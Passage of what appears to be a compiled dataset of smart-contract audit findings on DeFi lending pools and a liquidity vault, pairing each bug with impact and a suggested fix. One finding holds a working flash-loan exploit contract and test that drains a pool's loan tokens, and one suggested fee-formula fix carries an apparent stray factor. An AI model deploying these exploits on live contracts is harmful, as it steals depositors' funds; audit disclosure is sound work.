pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1200); \\n assertEq(pool.lastTotalDebt(), 2399); \\n\\n uint myCollateralBeforeLiquidate = collateralToken.balanceOf(address(this));\\n\\n // liquidate 200 for Alice\\n loanToken.approve(address(pool), 200);\\n for(int i; i<200; i++)\\n pool.liquidate(address(1), 1);\\n\\n // Alice's debt shares are NOT reduced, now Bob's debt is reduced to 1100\\n uint debtShares = pool.debtSharesBalanceOf(address(1));\\n assertEq(debtShares, 1000);\\n assertEq(pool.lastTotalDebt(), 2199);\\n address1Debt = pool.getDebtOf(pool.debtSharesBalanceOf(address(1)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(address1Debt, 1100); \\n mydebt = pool.getDebtOf(pool.debtSharesBalanceOf(address(this)), pool.debtSharesSupply(), pool.lastTotalDebt());\\n assertEq(mydebt, 1100); \\n\\n // Bob gains the collateral as well proportionately \\n uint myCollateralAfterLiquidate = collateralToken.balanceOf(address(this));\\n assertEq(myCollateralAfterLiquidate-myCollateralBeforeLiquidate, 200);\\n }\\n```\\n
Users can borrow all loan tokens
medium
Utilization rate check can be bypassed depositing additional loan tokens and withdrawing them in the same transaction.\\nIn the `borrow` function it is checked that the new utilization ratio will not be higher than the surge threshold. This threshold prevents borrowers from draining all available liquidity from the pool and also trigger the surge state, which lowers the collateral ratio.\\nA user can bypass this and borrow all available loan tokens following these steps:\\nDepositing the required amount of loan tokens in order to increase the balance of the pool.\\nBorrow the remaining loan tokens from the pool.\\nWithdraw the loan tokens deposited in the first step.\\nThis can be done in one transaction and the result will be a utilization rate of 100%. Even if the liquidity of the pool is high, the required loan tokens to perform the strategy can be borrowed using a flash loan.\\nHelper contract:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n\\nExecution:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport "forge-std/Test.sol";\\nimport "../src/Pool.sol";\\nimport "../src/Factory.sol";\\nimport "./mocks/Borrower.sol";\\nimport "./mocks/ERC20.sol";\\n\\ncontract PoC is Test {\\n address alice = vm.addr(0x1);\\n address bob = vm.addr(0x2);\\n Factory factory;\\n Pool pool;\\n Borrower borrower;\\n Flashloan flashLoan;\\n MockERC20 collateralToken;\\n MockERC20 loanToken;\\n uint maxCollateralRatioMantissa;\\n uint surgeMantissa;\\n uint collateralRatioFallDuration;\\n uint collateralRatioRecoveryDuration;\\n uint minRateMantissa;\\n uint surgeRateMantissa;\\n uint maxRateMantissa;\\n\\n function setUp() public {\\n factory = new Factory(address(this), "G");\\n flashLoan = new Flashloan();\\n collateralToken = new MockERC20(1 ether, 18);\\n collateralToken.transfer(bob, 1 ether);\\n loanToken = new MockERC20(100 ether, 18);\\n loanToken.transfer(alice, 1 ether);\\n loanToken.transfer(address(flashLoan), 99 ether);\\n maxCollateralRatioMantissa = 1e18;\\n surgeMantissa = 0.8e18; // 80%\\n pool = factory.deploySurgePool(IERC20(address(collateralToken)), IERC20(address(loanToken)), maxCollateralRatioMantissa, surgeMantissa, 1e15, 1e15, 0.1e18, 0.4e18, 0.6e18);\\n }\\n\\n function testFailBorrowAll() external {\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n pool.addCollateral(bob, 1 ether);\\n pool.borrow(1 ether);\\n vm.stopPrank();\\n }\\n\\n function testBypassUtilizationRate() external {\\n uint balanceBefore = loanToken.balanceOf(bob);\\n\\n // Alice deposits 1 LOAN token\\n vm.startPrank(alice);\\n loanToken.approve(address(pool), 1 ether);\\n pool.deposit(1 ether);\\n vm.stopPrank();\\n\\n // Bob tries to borrow all available loan tokens\\n vm.startPrank(bob);\\n collateralToken.approve(address(pool), 1 ether);\\n borrower = new Borrower(flashLoan, pool);\\n pool.addCollateral(address(borrower), 1 ether);\\n borrower.borrowAll();\\n vm.stopPrank();\\n\\n assertEq(loanToken.balanceOf(bob) - balanceBefore, 1 ether);\\n }\\n}\\n```\\n
A possible solution would be adding a locking period for deposits of loan tokens.\\nAnother possibility is to enforce that the utilization rate was under the surge rate also in the previous snapshot.
The vulnerability allows to drain all the liquidity from the pool, which entails two problems:\\nThe collateral ratio starts decreasing and only stops if the utilization ratio goes back to the surge threshold.\\nThe suppliers will not be able to withdraw their tokens.\\nThe vulnerability can be executed by the same or other actors every time a loan is repaid or a new deposit is done, tracking the mempool and borrowing any new amount of loan tokens available in the pool, until the collateral ratio reaches a value of zero.\\nA clear case with economic incentives to perform this attack would be that the collateral token drops its price at a high rate and borrow all the available loan tokens from the pool, leaving all suppliers without the chance of withdrawing their share.
```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity 0.8.17;\\n\\nimport { FlashBorrower, Flashloan, IERC20Token } from "./FlashLoan.sol";\\nimport { Pool } from "./../../src/Pool.sol";\\n\\ncontract Borrower is FlashBorrower {\\n address public immutable owner;\\n Flashloan public immutable flashLoan;\\n Pool public immutable pool;\\n IERC20Token public loanToken;\\n\\n constructor(Flashloan _flashLoan, Pool _pool) {\\n owner = msg.sender;\\n flashLoan = _flashLoan;\\n pool = _pool;\\n loanToken = IERC20Token(address(_pool.LOAN_TOKEN()));\\n }\\n\\n function borrowAll() public returns (bool) {\\n // Get current values from pool\\n pool.withdraw(0);\\n uint loanTokenBalance = loanToken.balanceOf(address(pool));\\n loanToken.approve(address(pool), loanTokenBalance);\\n\\n // Execute flash loan\\n flashLoan.execute(FlashBorrower(address(this)), loanToken, loanTokenBalance, abi.encode(loanTokenBalance));\\n }\\n\\n function onFlashLoan(IERC20Token token, uint amount, bytes calldata data) public override {\\n // Decode data\\n (uint loanTokenBalance) = abi.decode(data, (uint));\\n\\n // Deposit tokens borrowed from flash loan, borrow all other LOAN tokens from pool and\\n // withdraw the deposited tokens\\n pool.deposit(amount);\\n pool.borrow(loanTokenBalance);\\n pool.withdraw(amount);\\n\\n // Repay the loan\\n token.transfer(address(flashLoan), amount);\\n\\n // Send loan tokens to owner\\n loanToken.transfer(owner, loanTokenBalance);\\n }\\n}\\n```\\n
Fee share calculation is incorrect
medium
Fees are given to the feeRecipient by minting them shares. The current share calculation is incorrect and always mints too many shares the fee recipient, giving them more fees than they should get.\\nThe current equation is incorrect and will give too many shares, which is demonstrated in the example below.\\nExample:\\n```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n\\nCalculate the fee with the current equation:\\n```\\n_accuredFeeShares = fee * _totalSupply / supplied = 2 * 100 / 100 = 2\\n```\\n\\nThis yields 2 shares. Next calculate the value of the new shares:\\n```\\n2 * 110 / 102 = 2.156\\n```\\n\\nThe value of these shares yields a larger than expected fee. Using a revised equation gives the correct amount of fees:\\n```\\n_accuredFeeShares = (_totalSupply * fee) / (_supplied + _interest - fee) = 2 * 100 / (100 + 10 - 2) = 1.852\\n\\n1.852 * 110 / 101.852 = 2\\n```\\n\\nThis new equation yields the proper fee of 2.
Use the modified equation shown above:\\n```\\n uint fee = _interest * _feeMantissa / 1e18;\\n // 13. Calculate the accrued fee shares\\n- _accruedFeeShares = fee * _totalSupply / _supplied; // if supplied is 0, we will have returned at step 7\\n+ _accruedFeeShares = fee * (_totalSupply * fee) / (_supplied + _interest - fee); // if supplied is 0, we will have returned at step 7\\n // 14. Update the total supply\\n _currentTotalSupply += _accruedFeeShares;\\n```\\n
Fee recipient is given more fees than intended, which results in less interest for LPs
```\\n_supplied = 100\\n_totalSupply = 100\\n\\n_interest = 10\\nfee = 2\\n```\\n
fund loss because calculated Interest would be 0 in getCurrentState() due to division error
medium
function `getCurrentState()` Gets the current state of pool variables based on the current time and other functions use it to update the contract state. it calculates interest accrued for debt from the last timestamp but because of the division error in some cases the calculated interest would be 0 and it would cause borrowers to pay no interest.\\nThis is part of `getCurrentState()` code that calculates interest:\\n```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n\\ncode should support all the ERC20 tokens and those tokens may have different decimals. also different pools may have different values for MIN_RATE, SURGE_RATE, MAX_RATE. imagine this scenario:\\ndebt token is USDC and has 6 digit decimals.\\nMIN_RATE is 5% (2 * 1e16) and MAX_RATE is 10% (1e17) and in current state borrow rate is 5% (5 * 1e16)\\ntimeDelta is 2 second. (two seconds passed from last accrue interest time)\\ntotalDebt is 100M USDC (100 * 1e16).\\neach year has about 31M seconds (31 * 1e6).\\nnow code would calculate interest as: `_totalDebt * _borrowRate * _timeDelta / (365 days * 1e18) = 100 * 1e6 * 5 * 1e16 * 2 / (31 * 1e16 * 1e18) = 5 * 2 / 31 = 0`.\\nso code would calculate 0 interest in each interactions and borrowers would pay 0 interest. the debt decimal and interest rate may be different for pools and code should support all of them.
don't update contract state(lastAccrueInterestTime) when calculated interest is 0. add more decimal to total debt and save it with extra 1e18 decimals and transferring or receiving debt token convert the token amount to more decimal format or from it.
borrowers won't pay any interest and lenders would lose funds.
```\\n // 2. Get the time passed since the last interest accrual\\n uint _timeDelta = block.timestamp - _lastAccrueInterestTime;\\n \\n // 3. If the time passed is 0, return the current values\\n if(_timeDelta == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n \\n // 4. Calculate the supplied value\\n uint _supplied = _totalDebt + _loanTokenBalance;\\n // 5. Calculate the utilization\\n uint _util = getUtilizationMantissa(_totalDebt, _supplied);\\n\\n // 6. Calculate the collateral ratio\\n _currentCollateralRatioMantissa = getCollateralRatioMantissa(\\n _util,\\n _lastAccrueInterestTime,\\n block.timestamp,\\n _lastCollateralRatioMantissa,\\n COLLATERAL_RATIO_FALL_DURATION,\\n COLLATERAL_RATIO_RECOVERY_DURATION,\\n MAX_COLLATERAL_RATIO_MANTISSA,\\n SURGE_MANTISSA\\n );\\n\\n // 7. If there is no debt, return the current values\\n if(_totalDebt == 0) return (_currentTotalSupply, _accruedFeeShares, _currentCollateralRatioMantissa, _currentTotalDebt);\\n\\n // 8. Calculate the borrow rate\\n uint _borrowRate = getBorrowRateMantissa(_util, SURGE_MANTISSA, MIN_RATE, SURGE_RATE, MAX_RATE);\\n // 9. Calculate the interest\\n uint _interest = _totalDebt * _borrowRate * _timeDelta / (365 days * 1e18); // does the optimizer optimize this? or should it be a constant?\\n // 10. Update the total debt\\n _currentTotalDebt += _interest;\\n```\\n
cachedUserRewards variable is never reset, so user can steal all rewards
high
cachedUserRewards variable is never reset, so user can steal all rewards\\nWhen user wants to withdraw then `_withdrawUpdateRewardState` function is called. This function updates internal reward state and claims rewards for user if he provided `true` as `claim_` param.\\n```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n\\nWhen user calls claimRewards, then `cachedUserRewards` variable is added to the rewards he should receive. The problem is that `cachedUserRewards` variable is never reset to 0, once user claimed that amount.\\nBecause of that he can claim multiple times in order to receive all balance of token.
Once user received rewards, reset `cachedUserRewards` variable to 0. This can be done inside `_claimInternalRewards` function.
User can steal all rewards
```\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff -\\n userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n```\\n
User can receive more rewards through a mistake in the withdrawal logic
high
In the `withdraw()` function of the SingleSidedLiquidityVault the contract updates the reward state. Because of a mistake in the calculation, the user is assigned more rewards than they're supposed to.\\nWhen a user withdraws their funds, the `_withdrawUpdateRewardState()` function checks how many rewards those LP shares generated. If that amount is higher than the actual amount of reward tokens that the user claimed, the difference between those values is cached and the amount the user claimed is set to 0. That way they receive the remaining shares the next time they claim.\\nBut, the contract resets the number of reward tokens the user claimed before it computes the difference. That way, the full amount of reward tokens the LP shares generated are added to the cache.\\nHere's an example:\\nAlice deposits funds and receives 1e18 shares\\nAlice receives 1e17 rewards and claims those funds immediately\\nTime passes and Alice earns 5e17 more reward tokens\\nInstead of claiming those tokens, Alice withdraws 5e17 (50% of her shares) That executes `_withdrawUpdateRewardState()` with `lpAmount_ = 5e17` and claim = false:\\n```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n
First calculate `cachedUserRewards` then reset `userRewardDebts`.
A user can receive more reward tokens than they should by abusing the withdrawal system.
```\\n function _withdrawUpdateRewardState(uint256 lpAmount_, bool claim_) internal {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n // Handles accounting logic for internal and external rewards, harvests external rewards\\n uint256[] memory accumulatedInternalRewards = _accumulateInternalRewards();\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numInternalRewardTokens;) {\\n _updateInternalRewardState(i, accumulatedInternalRewards[i]);\\n if (claim_) _claimInternalRewards(i);\\n\\n // Update reward debts so as to not understate the amount of rewards owed to the user, and push\\n // any unclaimed rewards to the user's reward debt so that they can be claimed later\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n // @audit In our example, rewardDebtDiff = 3e17 (total rewards are 6e17 so 50% of shares earned 50% of reward tokens)\\n uint256 rewardDebtDiff = lpAmount_ * rewardToken.accumulatedRewardsPerShare;\\n\\n // @audit 3e17 > 1e17\\n if (rewardDebtDiff > userRewardDebts[msg.sender][rewardToken.token]) {\\n\\n // @audit userRewardDebts is set to 0 (original value was 1e17, the number of tokens that were already claimed)\\n userRewardDebts[msg.sender][rewardToken.token] = 0;\\n // @audit cached amount = 3e17 - 0 = 3e17.\\n // Alice is assigned 3e17 reward tokens to be distributed the next time they claim\\n // The remaining 3e17 LP shares are worth another 3e17 reward tokens.\\n // Alice already claimed 1e17 before the withdrawal.\\n // Thus, Alice receives 7e17 reward tokens instead of 6e17\\n cachedUserRewards[msg.sender][rewardToken.token] +=\\n rewardDebtDiff - userRewardDebts[msg.sender][rewardToken.token];\\n } else {\\n userRewardDebts[msg.sender][rewardToken.token] -= rewardDebtDiff;\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n
Vault can experience long downtime periods
medium
The chainlink price could stay up to 24 hours (heartbeat period) outside the boundaries defined by `THRESHOLD` but within the chainlink deviation threshold. Deposits and withdrawals will not be possible during this period of time.\\nThe `_isPoolSafe()` function checks if the balancer pool spot price is within the boundaries defined by `THRESHOLD` respect to the last fetched chainlink price.\\nSince in `_valueCollateral()` the `updateThreshold` should be 24 hours (as in the tests), then the OHM derived oracle price could stay at up to 2% from the on-chain trusted price. The value is 2% because in WstethLiquidityVault.sol#L223:\\n```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n\\n`stethPerWsteth` is mostly stable and changes in `stethUsd` and `ethUsd` will cancel out, so the return value changes will be close to changes in `ohmEth`, so up to 2% from the on-chain trusted price.\\nIf `THRESHOLD` < 2%, say 1% as in the tests, then the Chainlink price can deviate by more than 1% from the pool spot price and less than 2% from the on-chain trusted price fro up to 24 h. During this period withdrawals and deposits will revert.
Issue Vault can experience long downtime periods\\n`THRESHOLD` is not fixed and can be changed by the admin, meaning that it can take different values over time.Only a tight range of values around 2% should be allowed to avoid the scenario above.
Withdrawals and deposits can be often unavailable for several hours.
```\\nreturn (amount_ * stethPerWsteth * stethUsd * decimalAdjustment) / (ohmEth * ethUsd * 1e18);\\n```\\n
SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect
medium
SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect.\\nIn SingleSidedLiquidityVault, ohmMinted indicates the number of ohm minted in the contract, and ohmRemoved indicates the number of ohm burned in the contract. So the contract just needs to increase ohmMinted in deposit() and increase ohmRemoved in withdraw(). But withdraw() decreases ohmMinted, which makes the calculation involving ohmMinted incorrect.\\n```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n\\nConsider that a user minted 100 ohm in deposit() and immediately burned 100 ohm in withdraw().\\nIn _canDeposit, the amount_ is less than LIMIT + 1000 instead of LIMIT\\n```\\n function _canDeposit(uint256 amount_) internal view virtual returns (bool) {\\n if (amount_ + ohmMinted > LIMIT + ohmRemoved) revert LiquidityVault_LimitViolation();\\n return true;\\n }\\n```\\n\\ngetOhmEmissions() returns 1000 instead of 0\\n```\\n function getOhmEmissions() external view returns (uint256 emitted, uint256 removed) {\\n uint256 currentPoolOhmShare = _getPoolOhmShare();\\n\\n if (ohmMinted > currentPoolOhmShare + ohmRemoved)\\n emitted = ohmMinted - currentPoolOhmShare - ohmRemoved;\\n else removed = currentPoolOhmShare + ohmRemoved - ohmMinted;\\n }\\n```\\n
Issue SingleSidedLiquidityVault.withdraw will decreases ohmMinted, which will make the calculation involving ohmMinted incorrect\\n```\\n function withdraw(\\n uint256 lpAmount_,\\n uint256[] calldata minTokenAmounts_,\\n bool claim_\\n ) external onlyWhileActive nonReentrant returns (uint256) {\\n // Liquidity vaults should always be built around a two token pool so we can assume\\n // the array will always have two elements\\n if (lpAmount_ == 0 || minTokenAmounts_[0] == 0 || minTokenAmounts_[1] == 0)\\n revert LiquidityVault_InvalidParams();\\n if (!_isPoolSafe()) revert LiquidityVault_PoolImbalanced();\\n\\n _withdrawUpdateRewardState(lpAmount_, claim_);\\n\\n totalLP // Remove the line below\\n= lpAmount_;\\n lpPositions[msg.sender] // Remove the line below\\n= lpAmount_;\\n\\n // Withdraw OHM and pairToken from LP\\n (uint256 ohmReceived, uint256 pairTokenReceived) = _withdraw(lpAmount_, minTokenAmounts_);\\n\\n // Reduce deposit values\\n uint256 userDeposit = pairTokenDeposits[msg.sender];\\n pairTokenDeposits[msg.sender] // Remove the line below\\n= pairTokenReceived > userDeposit\\n ? userDeposit\\n : pairTokenReceived;\\n// Remove the line below\\n ohmMinted // Remove the line below\\n= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived // Remove the line below\\n ohmMinted : 0;\\n```\\n
It will make the calculation involving ohmMinted incorrect.
```\\n ohmMinted -= ohmReceived > ohmMinted ? ohmMinted : ohmReceived;\\n ohmRemoved += ohmReceived > ohmMinted ? ohmReceived - ohmMinted : 0;\\n```\\n
SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time
medium
SingleSidedLiquidityVault._accumulateInternalRewards will revert with underflow error if rewardToken.lastRewardTime is bigger than current time\\n```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n\\nThe line is needed to see is this `uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime`. In case if `rewardToken.lastRewardTime > block.timestamp` than function will revert and ddos functions that use it.\\n```\\n function addInternalRewardToken(\\n address token_,\\n uint256 rewardsPerSecond_,\\n uint256 startTimestamp_\\n ) external onlyRole("liquidityvault_admin") {\\n InternalRewardToken memory newInternalRewardToken = InternalRewardToken({\\n token: token_,\\n decimalsAdjustment: 10**ERC20(token_).decimals(),\\n rewardsPerSecond: rewardsPerSecond_,\\n lastRewardTime: block.timestamp > startTimestamp_ ? block.timestamp : startTimestamp_,\\n accumulatedRewardsPerShare: 0\\n });\\n\\n\\n internalRewardTokens.push(newInternalRewardToken);\\n }\\n```\\n\\nIn case if `startTimestamp_` is in the future, then it will be set and cause that problem. lastRewardTime: block.timestamp > `startTimestamp_` ? block.timestamp : `startTimestamp_`.\\nNow till, `startTimestamp_` time, `_accumulateInternalRewards` will not work, so vault will be stopped. And of course, admin can remove that token and everything will be fine. That's why i think this is medium.
Skip token if it's `lastRewardTime` is in future.
SingleSidedLiquidityVault will be blocked
```\\n function _accumulateInternalRewards() internal view returns (uint256[] memory) {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256[] memory accumulatedInternalRewards = new uint256[](numInternalRewardTokens);\\n\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n InternalRewardToken memory rewardToken = internalRewardTokens[i];\\n\\n\\n uint256 totalRewards;\\n if (totalLP > 0) {\\n uint256 timeDiff = block.timestamp - rewardToken.lastRewardTime;\\n totalRewards = (timeDiff * rewardToken.rewardsPerSecond);\\n }\\n\\n\\n accumulatedInternalRewards[i] = totalRewards;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return accumulatedInternalRewards;\\n }\\n```\\n
claimFees may cause some external rewards to be locked in the contract
medium
claimFees will update rewardToken.lastBalance so that if there are unaccrued reward tokens in the contract, users will not be able to claim them.\\n_accumulateExternalRewards takes the difference between the contract's reward token balance and lastBalance as the reward. and the accumulated reward tokens are updated by _updateExternalRewardState.\\n```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n\\nauraPool.rewardsPool.getReward can be called by anyone to send the reward tokens to the contract\\n```\\n function getReward(address _account, bool _claimExtras) public updateReward(_account) returns(bool){\\n uint256 reward = earned(_account);\\n if (reward > 0) {\\n rewards[_account] = 0;\\n rewardToken.safeTransfer(_account, reward);\\n IDeposit(operator).rewardClaimed(pid, _account, reward);\\n emit RewardPaid(_account, reward);\\n }\\n\\n //also get rewards from linked rewards\\n if(_claimExtras){\\n for(uint i=0; i < extraRewards.length; i++){\\n IRewards(extraRewards[i]).getReward(_account);\\n }\\n }\\n return true;\\n }\\n```\\n\\nHowever, in claimFees, the rewardToken.lastBalance will be updated to the current contract balance after the admin has claimed the fees.\\n```\\n function claimFees() external onlyRole("liquidityvault_admin") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nConsider the following scenario.\\nStart with rewardToken.lastBalance = 200.\\nAfter some time, the rewardToken in aura is increased by 100.\\nSomeone calls getReward to claim the reward tokens to the contract, and the 100 reward tokens increased have not yet been accumulated via _accumulateExternalRewards and _updateExternalRewardState.\\nThe admin calls claimFees to update rewardToken.lastBalance to 290(10 as fees).\\nUsers call claimRewards and receives 0 reward tokens. 90 reward tokens will be locked in the contract
